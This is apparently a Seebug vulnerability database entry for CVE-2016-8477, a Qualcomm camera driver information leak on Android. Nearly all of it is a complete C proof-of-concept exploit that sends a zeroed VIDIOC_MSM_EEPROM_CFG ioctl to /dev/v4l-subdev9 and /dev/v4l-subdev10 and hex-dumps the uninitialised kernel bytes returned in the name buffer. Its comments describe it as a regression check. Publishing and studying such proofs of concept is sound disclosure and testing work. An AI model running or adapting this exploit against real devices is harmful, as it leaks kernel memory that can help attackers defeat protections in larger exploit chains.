seebug | Root | SSV:92873
History: Apr 04, 2017 - 12:00 a.m.

Google Android Qualcomm Camera Driver Multiple Information Disclosure Vulnerabilities (CVE-2016-8477)

2017-04-04 00:00:00
Root
www.seebug.org
30

0.001 Low

EPSS

Percentile

48.7%

No description provided by source.


#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <linux/types.h>
#include <linux/videodev2.h>

/*
 * Size in bytes of the eeprom_name array inside msm_eeprom_cfg_data.cfg.
 * It is the widest member of that union, so it also sets how many bytes of
 * the union travel across the ioctl boundary.
 */
#define MAX_SENSOR_NAME 32

/*
 * Sub-command selector carried in msm_eeprom_cfg_data.cfgtype.
 * Enumerators take the values 0..4 in declaration order, so a request that
 * is zero-filled selects CFG_EEPROM_GET_INFO.
 * NOTE(review): local copy of the driver's definition, presumably taken from
 * the kernel's camera UAPI header; the order must match the kernel's exactly.
 */
enum eeprom_cfg_type_t {
	CFG_EEPROM_GET_INFO,
	CFG_EEPROM_GET_CAL_DATA,
	CFG_EEPROM_READ_CAL_DATA,
	CFG_EEPROM_WRITE_DATA,
	CFG_EEPROM_GET_MM_INFO,
};

/*
 * Union member holding a single 32-bit byte count.
 * It covers only the first 4 bytes of the 32-byte cfg union; the remaining
 * bytes keep whatever the writer left there.
 */
struct eeprom_get_t {
	uint32_t num_bytes;
};

/*
 * Union member pairing a buffer pointer with a byte count.
 * NOTE(review): the raw pointer makes this member (and the ioctl argument as
 * a whole) differ in size between 32-bit and 64-bit builds; build for the ABI
 * the driver under test expects.
 */
struct eeprom_read_t {
	uint8_t *dbuffer;
	uint32_t num_bytes;
};

/*
 * Union member with the same shape as eeprom_read_t: a buffer pointer plus a
 * byte count. Not used by main() in this listing.
 */
struct eeprom_write_t {
	uint8_t *dbuffer;
	uint32_t num_bytes;
};

/*
 * Union member made of three 32-bit fields (12 bytes).
 * Not used by main() in this listing; declared so the cfg union has the same
 * member list as the driver's structure.
 */
struct eeprom_get_cmm_t {
	uint32_t cmm_support;
	uint32_t cmm_compression;
	uint32_t cmm_size;
};

/*
 * Argument structure for VIDIOC_MSM_EEPROM_CFG.
 *
 * cfgtype selects the sub-command, and cfg is interpreted according to it.
 * The union is as large as its widest member, eeprom_name (MAX_SENSOR_NAME
 * bytes). A handler that fills only a short string or one of the smaller
 * members and then copies the whole structure back to the caller also returns
 * every byte it did not set. The caller therefore has to zero the structure
 * before the call to tell its own bytes apart from returned ones.
 * NOTE(review): the kernel-side handler is not part of this listing; the
 * layout here must match the driver's definition for the ioctl number and the
 * field offsets to line up.
 */
struct msm_eeprom_cfg_data {
	enum eeprom_cfg_type_t cfgtype;
	uint8_t is_supported;
	union {
		char eeprom_name[MAX_SENSOR_NAME];
		struct eeprom_get_t get_data;
		struct eeprom_read_t read_data;
		struct eeprom_write_t write_data;
		struct eeprom_get_cmm_t get_cmm_data;
	} cfg;
};

/*
 * ioctl request number for the EEPROM configuration call: type 'V', command
 * BASE_VIDIOC_PRIVATE + 8 (BASE_VIDIOC_PRIVATE comes from
 * <linux/videodev2.h>). _IOWR marks the argument as copied in both directions
 * and encodes sizeof(struct msm_eeprom_cfg_data) into the number, so a layout
 * mismatch with the driver changes the request value as well.
 */
#define VIDIOC_MSM_EEPROM_CFG \
	_IOWR('V', BASE_VIDIOC_PRIVATE + 8, struct msm_eeprom_cfg_data)


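/*
 * Regression check for the VIDIOC_MSM_EEPROM_CFG information disclosure
 * named in the advisory title (CVE-2016-8477).
 *
 * For /dev/v4l-subdev9 and /dev/v4l-subdev10 the program sends a zero-filled
 * request (cfgtype 0 == CFG_EEPROM_GET_INFO) and prints what the driver
 * returns in cfg.eeprom_name: first as a string, then as a hex dump of all
 * MAX_SENSOR_NAME bytes. Because the request is zeroed before every call, any
 * non-zero byte after the name's NUL terminator was put there by the kernel.
 * NOTE(review): on a patched kernel the tail is presumably all zero; the
 * usual driver-side remedy is to zero the structure before filling it or to
 * copy back only the bytes that were set. Confirm against the vendor patch.
 *
 * Returns 0 after both nodes were tried; exits with EXIT_FAILURE only if the
 * device path cannot be formatted.
 */
int main(void)
{
	char subdev[32] = { 0 };
	struct msm_eeprom_cfg_data request;
	int i;

	printf("=== Kernel VIDIOC_MSM_EEPROM_CFG Info Leak ===\n");

	for (i = 9; i < 11; i++) {
		size_t j;
		int fd;
		int len;

		/* Treat truncation as a failure too, not only an encoding error. */
		len = snprintf(subdev, sizeof(subdev), "/dev/v4l-subdev%d", i);
		if (len < 0 || (size_t)len >= sizeof(subdev)) {
			printf("Failed to snprintf\n");
			exit(EXIT_FAILURE);
		}

		fd = open(subdev, O_RDWR);
		if (fd < 0) {
			printf("Couldn't open %s with error %s\n", subdev, strerror(errno));
			continue;
		}

		/* Start from a known all-zero argument for every device node. */
		memset(&request, 0x00, sizeof(request));

		/*
		 * ioctl() reports failure with -1. The earlier "ret > 0" test never
		 * caught that, so a failed call was followed by a dump of the
		 * untouched buffer, and its branch returned the descriptor number
		 * as the exit status without closing it.
		 */
		if (ioctl(fd, VIDIOC_MSM_EEPROM_CFG, &request) < 0) {
			printf("ioctl on %s failed with error %s\n", subdev, strerror(errno));
			close(fd);
			continue;
		}

		/* Bound the print: the returned name is not guaranteed to be terminated. */
		printf("Got name: %.*s\n", (int)sizeof(request.cfg.eeprom_name),
		       request.cfg.eeprom_name);

		printf("Dump of entire name buf:\n");

		/*
		 * Hex dump of the whole array. The cast stops bytes >= 0x80 from
		 * being sign-extended and printed as FFFFFFxx where char is signed.
		 */
		for (j = 0; j < sizeof(request.cfg.eeprom_name); j++) {
			printf("%2X ", (unsigned char)request.cfg.eeprom_name[j]);
		}

		printf("\n");

		close(fd);
	}

	return 0;
}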
                              
